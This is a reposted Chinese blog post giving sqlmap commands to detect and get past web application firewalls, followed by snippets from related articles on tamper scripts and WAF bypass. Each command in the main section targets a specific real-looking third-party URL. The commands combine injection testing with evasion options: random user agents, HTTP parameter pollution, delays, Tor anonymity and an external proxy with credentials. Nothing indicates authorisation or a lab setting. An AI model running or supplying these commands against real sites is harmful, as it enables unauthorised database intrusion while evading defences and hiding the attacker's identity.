SQLmap————9、使用参数绕防火墙

最新推荐文章于 2023-10-17 23:02:47 发布
转载 最新推荐文章于 2023-10-17 23:02:47 发布 · 836 阅读 · 8

本文介绍如何使用SQLMap工具进行Web应用的安全测试,包括如何检测Web服务是否受防火墙保护,以及如何通过多种技术手段绕过Web应用防火墙(WAF)。文章列举了多个SQLMap的具体命令实例,如使用--identify-waf参数检测WAF类型,利用--random-agent随机User-Agent绕过限制等。

检测web服务是否受到防火墙保护

首选

sqlmap -u http://yiliao.kingdee.com/contents.php?id=51&types=4--thread 10   --identify-waf

备选

sqlmap -uhttp://yiliao.kingdee.com/contents.php?id=51&types=4 –thread 10    --check-waf

使用参数绕防火墙

使用任意浏览器进行绕过,尤其是在WAF配置不当的时候

sqlmap -u http://yiliao.kingdee.com/contents.php?id=51&types=4    --random-agent -v2

禁止使用系统的代理,直接连接进行注入

sqlmap -u http://yiliao.kingdee.com/contents.php?id=51&types=4    --ignore-proxy

清空会话,重构注入

sqlmap -u http://yiliao.kingdee.com/contents.php?id=51&types=4  --flush-session

使用参数--no-cast ,进行字符码转换

sqlmap -u http://yiliao.kingdee.com/contents.php?id=51&types=4  --hex

对移动端的服务器进行注入

sqlmap -u http://yiliao.kingdee.com/contents.php?id=51&types=4 –mobile

匿名注入

sqlmap -u http://yiliao.kingdee.com/contents.php?id=51&types=4  –tor

使用HTTP 参数污染进行绕过,尤其是在ASP.NET/IIS 平台上

sqlmap -u http://yiliao.kingdee.com/contents.php?id=51&types=4    --hpp-v 3

使用长的延时来避免触发WAF的机制,这方式比较耗时

sqlmap -u http://yiliao.kingdee.com/contents.php?id=51&types=4    --delay=3.5 --time-sec=60

使用代理进行注入

Sqlmap -u  http://yiliao.kingdee.com/contents.php?id=51&types=4   --proxy=211.211.211.211:8080 

              --proxy-cred=211:985

sqlmap(超超超详细使用教程)——实例说明最后介绍提权和waf狗的脚本
记录并分享学习安全的知识点..
12-31 1399
一、明确使用sqlmap进行sql注入操作流程: (1)判断可注入的参数 (2)判断可以用那种SQL注入技术来注入 (3)识别出哪种数据库 (4)根据用户选择,读取哪些数据 二、目标后所接的参数说明 -u +URL -d #直连数据库,"mysql://root:root@192.168.1.1:3306/mysql" -l #从Burp代理日志文件中解析目标地址 -m #从文本文件中批量获取目标 -r #从文件中读取 HTTP 请求 --purge #清除历史缓存 --flush-sessi.
[NewStarCTF 2023 公开赛道]ez_sql1 【sqlmap使用/大小写过】
2401_86190146的博客
03-10 540
题目:发现id处可以sql注入:虽然输入id=1';#没什么回显,但是知道这里是字符型注入了。
WEB漏洞-SQL注入-利用SQLMAP工具WAF
ranzi.
01-25 4593
此时可以在SQLMAP的命令里加入“--random-agent”参数,此参数的作用是使User-Agent后面的值按照其字典随机出现。因此就需要我们自己来写脚本,在自己写脚本的过程中可以参考“tamper”下的脚本,可以对里面的脚本进行修改。在漏洞防护规则里可以看到包含一种名为“工具拦截”的检测类型,当其发现是使用sqlmap工具时,就会进行拦截。但是这些默认的脚本必然是不能过我们现在常见的一些WAF的(可以过一些比赛的拦截规则,如CTF比赛等)。可以看到此时网站可以正常访问,可以进行正常注入。
使用sqlmap 防火墙进行注入测试
热门推荐
煜铭2011
04-20 4万+
0x00 前言 现在的网络环境往往是WAF/IPS/IDS保护着Web 服务器等等,这种保护措施往往会过滤挡住我们的SQL注入查询链接,甚至封锁我们的主机IP,所以这个时候,我们就要考虑怎样进行过,达到注入的目标。因为现在WAF/IPS/IDS都把sqlmap 列入黑名单了,呵呵!但是本文基于sqlmap 进行过注入测试,介绍至今仍然实用有效的技巧,以下策略在特定的环境能够成功...
sqlmap注入之tamperWAF防火墙过滤
ru_li的专栏
05-19 1万+
每当注入的时候看到这个贱贱的提示框,内心有千万只草泥马在奔腾。   但很多时候还是得静下来分析过滤系统到底过滤了哪些参数,该如何过。 sqlmap中的tamper给我们带来了很多防过滤的脚本,非常实用,可能有的朋友还不知道怎样才能最有效的利用tamper脚本。 当然使用脚本之前需要确定的就是系统过滤了哪些关键字,比如单引号、空格、select、union、admin等等。 所以
sqlmap使用详解(三:防火墙
→_→
10-11 3444
目录 0x01 确认WAF 0x02 使用参数进行过 0x03 使用脚本介绍 1 使用格式: 2 脚本总类 0x04脚本参数组合策略过 1 mysql过: 2 MSSQL: 3 ms access: 4Oracle: 5 建议: 0x01 确认WAF 首先我们判断该Web 服务器是否被WAF/IPS/IDS保护着。这点很容易实现,因为我们在漏扫或者使用专门工具来检测是否有WAF,这个检测,在nmap 的NSE,或者WVS的策略或者APPSCAN的策略中都有,我...
sqlmap tamper mysql_SQLmap使用tamperWAF防火墙过滤
weixin_30291543的博客
01-30 450
如何判断使用哪个脚本最简单的办法就是在url参数中手工带入关键词,判断是否被过滤。如图:直接加个单引号被过滤,说明注入时单引号是没法用的。空格、等于号都没有过滤,成功报错。select被过滤。以此类推,当sqlmap注入出现问题时,比如不出数据,就要检查对应的关键词是否被过滤。比如空格被过滤可以使用space2comment.py,过滤系统对大小写敏感可以使用randomcase.py等等。下面对...
Sqlmapwaf
chaojixiaojingang
07-18 1650
支持的数据库 编号 脚本名称 作用 实现方式 all 1 apostrophemask.py 用utf8代替引号 ("1AND'1'='1") '1AND%EF%BC%871%EF%BC%87=%EF%BC%871' 2 base64encode.py 用base64编码替换 ("1'ANDSLEEP...
19、SQL注入之SQLMAPWAF
山兔的博客
08-14 4074
搜索引擎会对我们的网站进行爬取,因为它的收录就是对我们的网站采取爬虫技术,而且速度很快,也是符合拦截规则的,但是WAF却不会去拦截,因为WAF会去识别你这个是用户访问,还是搜索引擎爬取,所以我们可以通过数据包的伪造,伪造成搜索引擎,对目标的网站进行访问,这个时候waf肯定会放行,因为它觉得这个是搜索引擎的访问,是正常的、官方的一种收录行为,不会是用户的攻击行为。一个是获取IP是不是通过脚本去获取,如果是的话,可以去伪造IP,通过tcp/udp网络层方式获取的,那是没有办法伪造的。
【Python脚本】SQLMap的Tamper脚本——过网站自身
weixin_55205599的博客
10-17 708
实现SQL注入漏洞的检测与利用的自动化处理,其自带的Tamper脚本可以帮助过IDS/WAF的检测。
SQLmap简单的使用——新手教程解析
m0_52027565的博客
10-11 2677
SQLmap简单的使用——新手教程解析 你好哇!今天给大家介绍一款白帽子工具。他就是号称"数据库的克星"——SQLmapSQLmap解析学习须知:一、sqlmap的安装与操作?(window与linux)1.windows版2.linux版二、使用步骤1.简单的探测WAF2.初步学习的使用sqlmap命令3.简单的使用tamper脚本WAF补充:宽字节注入: 学习须知: 在21世纪的网络空间中,各大互联网巨头通过各种数据库泄露情报的事件都屡见不鲜。我们如何才能很完美的保护我们的数据不被泄呢?这
SQL注入篇——sqlmap安装使用详解
爱国小白帽
01-25 7280
SQL注入篇——注入工具sqlmap使用详解 sqlmap简介 sqlmap是一个开源的渗透测试工具,它自动检测和利用SQL注入漏洞并接管数据库服务器。它配备了强大的检测引擎、最终渗透测试器的许多利基特性和广泛的开关,从数据库指纹、从数据库获取数据到通过带外连接访问底层文件系统和在操作系统上执行命令。 sqlmap功能 全力支持MySQL、Oracle、PostgreSQL、Microsof...
sqlmap的常用tamper脚本
浅笑996的博客
11-02 3283
sqlmap下的tamper目录存放WAF脚本 使用方法 --tamper 脚本名称,脚本名称 多个tamper脚本之间用空格隔开 apostrophemask.py 用utf8代替引号 equaltolike.py like代替等号 space2dash.py 过过滤‘=...
网络安全-sqlmap学习笔记
关注网络安全、云原生安全
06-08 8548
介绍 检测和利用SQL注入的工具。 命令参数 参数解释 参数 含义 描述 -h,--help 帮助 显示基本帮助消息并退出 -hh 高级帮助 显示高级帮助消息并退出 --version 版本 显示程序的版本号并退出 -u,-url=URL URL 目标URL(例如“ http://www.site.com/vuln.php?id=1”) -d DIRECT 连接字符串,用于数据库直接连接 -l .
SQLMAP注入参数-其他参数介绍
分享学习网络的点点滴滴
08-15 1358
指定扫描的参数,使–level失效1-5级(默认1)/usr/share/sqlmap/xml/payloads 查看不同级别下发送不同的payload。
我的SQLmap使用方法(详解)
weixin_41182861的博客
05-12 4736
SQLMAP是一个由Python语言编写的开源渗透测试工具,它主要用来检测sql注入漏洞(sql盲注、union查询、显错注入、延迟注入、post注入、cookie注入等),是一款功能强大的sql漏洞检测利用工具。sqlmap可以检测的数据库有:access、mssql、mysql、oracle、postgresql、db2、sqlite等。其他功能:执行命令、列举用户、检测权限、自动破解、数据导出等功能。...
Sqlmap常见命令
KHOST的博客
02-16 997
借着复习mysql的机会再重新复习一下sqlmap,因为参数太多了,我只记录一下自己常用的命令,如果想看详细大全,可以看一下大佬们的完整版 文章参考 https://blog.youkuaiyun.com/Breeze_CAT/article/details/80628392 https://blog.youkuaiyun.com/SHIGUANGTUJING/article/details/91429067 想...
渗透测试工具sqlmap基础教程
不知火猪
03-05 1328
渗透测试工具sqlmap基础教程,从入门到精通 本文仅献给想学习渗透测试的sqlmap小白,大牛请过。 对于网络安全人员来说,掌握渗透工具的使用方法是一项必备的技能。然而,一个没有师傅带领的小白在刚开始学习时,并不知道该如何入手进行渗透学习,所以本文旨在帮助这些小白入门。 sqlmap是一款非常强大的开源sql自动化注入工具,可以用来检测和利用sql注入漏洞。它由python语言开发而成,因此...
sqlmap常用指令
a_running_snail_的博客
06-20 1555
Sqlmap笔记 sqlmap -u 注入点 检测注入点是否可用 sqlmap -u 注入点 –batch 自动输入 暴库 sqlmap -u 注入点 –dbs //暴库 Web当前使用的数据库 sqlmap -u 注入点 –current-db //爆当前使用的库 Web数据库使用的账户 sqlmap -u 注入点 ...
sqlmap使用
最新发布
03-12
### 关于 SQLMap 使用教程 #### 工具概述 SQLMap 是一个功能强大的自动化 SQL 注入工具,可以用来检测并利用 SQL 注入漏洞以接管数据库服务器。此工具不仅能够识别不同类型的注入点,还能执行多种攻击向量,并支持...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值